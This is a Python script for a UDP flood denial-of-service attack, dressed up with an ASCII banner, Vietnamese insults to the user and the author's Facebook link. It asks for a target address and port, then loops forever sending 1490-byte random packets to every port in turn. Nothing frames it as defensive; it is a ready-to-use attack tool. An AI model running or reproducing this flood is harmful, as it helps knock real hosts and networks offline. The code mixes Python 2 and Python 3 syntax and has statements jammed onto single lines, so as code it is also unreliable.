import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############

os.system("clear")
def banner () :
    print (' ')
    print ('\033[1;91m ███╗   ███╗ ██████╗ ███╗   ██╗███████╗████████═╗███████╗ ██████╗')
    print ('\033[1;91m ████╗ ████║██╔═══██╗████╗  ██║██╔════╝ ╚══██╔══╝██╔════╝ ██╔══██╗')
    print ('\033[1;91m ██╔████╔██║██║   ██║██╔██╗ ██║███████╗    ██║   █████╗   ██████╔╝')
    print ('\033[1;91m ██║╚██╔╝██║██║   ██║██║╚██╗██║╚════██║    ██║   ██╔══╝   ██╔══██╗')
    print ('\033[1;91m ██║ ╚═╝ ██║╚██████╔╝██║ ╚████║███████║    ██║   ███████╗ ██║  ██║')
    print ('\033[1;91m ╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝    ╚═╝   ╚══════╝ ╚═╝  ╚═╝')
    print ('\033[1;91m ░ ▒░▒▓▒  ░  ░░ ▒░▒░▒░ ░ ▒░   ▒ ▒ ▒ ▒▓▒ ▒ ░  ▒ ░░   ░░ ▒░ ░░ ▒▓ ░▒▓░')
    print ('\033[1;91m ░  ░      ░  ░ ▒ ▒░ ░ ░░   ░ ▒░░ ░▒  ░ ░    ░     ░ ░  ░  ░▒ ░ ▒░')
    print ('\033[1;91m     ░░  ░ ░ ░ ▒     ░   ░ ░ ░  ░  ░    ░      ░  @vanhdz122 ░ ')
    print ('\033[1;91m  ░       ░ ░   ░     ░  ░ ░  ░  ░░ ░ ▒░  ░      ░    ░  ░   ░')
time.sleep(2)
print("\033[4;31m anh là hoàng việt anh")
time.sleep(2)
print("\033[4;31m Don't Forget !! bố mày trùm")
time.sleep(2)
print("\033[4;31m Kết bạn bố:https://www.facebook.com/profile.php?id=100074802690241")
time.sleep(2)
v7x = input ("\033[1;92m Đm add bố đi!?: ")
time.sleep(2)
print ("cút dùng cc" +v7x) 

ip = raw_input("điền link vào thăng l : ")
port = input("bừa 4 số vàcucu       : ")

os.system("clear")
print(' ')
print ('\033[1;91m                               /T /I')                                                              print ('\033[1;91m                              / |/ | .-~/')                                                         print ('\033[1;91m                          T\ Y  I  |/  /  _')                                                       print ('\033[1;91m         /T               | \I  |  I  Y.-~/')
print ('\033[1;91m        I l   /I       T\ |  |  l  |  T  /')                                                        print ('\033[1;91m     T\ |  \ Y l  /T   | \I  l   \ `  l Y')                                                         print ('\033[1;91m __  | \l   \l  \I l __l  l   \   `  _. |')                                                         print ('\033[1;91m \ ~-l  `\   `\  \  \\ ~\  \   `. .-~   |')
print ('\033[1;91m  \   ~-. "-.  `  \  ^._ ^. "-.  /  \   |')                                                         print ('\033[1;91m --~-._  ~-  `  _  ~-_.-"-." ._ /._ ." ./')
print ('\033[1;91m >--.  ~-.   ._  ~>-"    "\\   7   7   ]')                                                          print ('\033[1;91m^.___~"--._    ~-{  .-~ .  `\ Y . /    |')                                                          print ('\033[1;91m <__ ~"-.  ~       /_/   \   \I  Y   : |')
print ('\033[1;91m   ^-.__           ~(_/   \   >._:   | l______')                                                    print ('\033[1;91m       ^--.,___.-~"  /_/   !  `-.~"--l_ /     ~"-.')
print ('''\033[1;91m              (_/ .  ~(   /'     "~"--,Y   -=b-. _)''')                                           print ('''\033[1;91m               (_/ .  \  :           / l      c"~o''')
print ('\033[1;91m                \ /    `.    .     .^   \_.-~"~--.  ')                                              print ('\033[1;91m                 (_/ .   `  /     /       !       )/')
print ('''\033[1;91m                  / / _.   '.   .':      /        ''')                                            print ('\033[1;91m                  ~(_/ .   /    _  `  .-<_')
print ('''\033[1;91m                    /_/ . ' .-~" `.  / \  \          ,z=.''')
print ('''\033[1;91m                    ~( /   '  :   | K   "-.~-.______//''')
print ('\033[1;91m                       "-,.    l   I/ \_    __{--->._(==.')
print ('\033[1;91m                        //(     \  <    ~"~"     //')
print ('''\033[1;91m                      /' /\     \  \     ,v=.  ''')
print ('\033[1;91m                    .^. / /\     "  }__ //===-  `')
print ('''\033[1;91m                   / / ' '  "-.,__ {---(==-''')
print ('''\033[1;91m                 .^ '       :  T  ~"   ll       ANH LÀ HOÀNG VIANHANH ''')
print ('\033[1;91m                / .  .  . : | :!        \\')
print ('\033[1;91m               (_/  /   | | j-"          ~^')
print ('\033[1;91m                 ~-<_(_.^-~"')

print ("\033[1;91m     Chờ 1 tý thằng đb           ")
print (' ')
print "\033[1;92m [                    ] 0% "
time.sleep(5)
print "\033[1;92m [=====               ] 25%"
time.sleep(5)
print "\033[1;92m [==========          ] 50%"
time.sleep(5)
print "\033[1;92m [===============     ] 75%"
time.sleep(5)
print "\033[1;92m [====================] 100%"
time.sleep(3)
sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     port = port + 1
     print "\033[1;91m Sent %s packet to %s throught port:%s"%(sent,ip,port)
     if port == 65534:
       port = 1
